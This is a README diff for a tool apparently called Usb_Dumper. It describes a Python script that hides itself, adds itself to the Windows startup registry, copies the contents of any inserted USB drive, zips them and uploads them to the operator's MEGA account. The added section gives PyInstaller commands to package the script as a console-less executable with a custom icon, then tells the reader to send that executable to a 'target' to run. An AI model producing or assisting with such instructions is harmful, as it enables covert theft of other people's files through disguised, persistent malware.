HamzaHashim12/Usb_Dumper/README.md

    - The script will copy itself to a hidden location and add itself to the Windows startup registry.
    - It will continuously monitor USB drives (except `C:\` and `D:\`).
    - If changes are detected on a USB drive, it will copy the contents, zip them, and upload the zip file to your MEGA account in the `usb_captures` folder.

 ---

+## Converting Script into a Binary Executable

+To convert the Python script into a standalone executable file, follow these steps:

+1. **Save the Folder on Desktop and Extract It:**
+   - Save the `Usb_Dumper` folder on your Desktop and extract its contents.

+2. **Open Terminal and Run Commands:**
+   - Open a terminal or command prompt and navigate to the `Usb_Dumper` folder:

+     ```bash
+     cd Desktop
+     cd Usb_Dumper
+     ```

+   - Run the following command to convert the script into an executable:

+     ```bash
+     pyinstaller usb_dumper.py --onefile --noconsole --icon icon.ico
+     ```

+   - This will create a standalone executable file.

+3. **Locate the Executable:**
+   - The executable file will be located in the `dist` folder:
+     ```
+     Desktop/Usb_Dumper/dist/usb_dumper.exe
+     ```

+4. **Send the Executable to Your Target:**
+   - You can now send the `usb_dumper.exe` file to your target.
+When they run it, the script will execute and perform its functions.

+---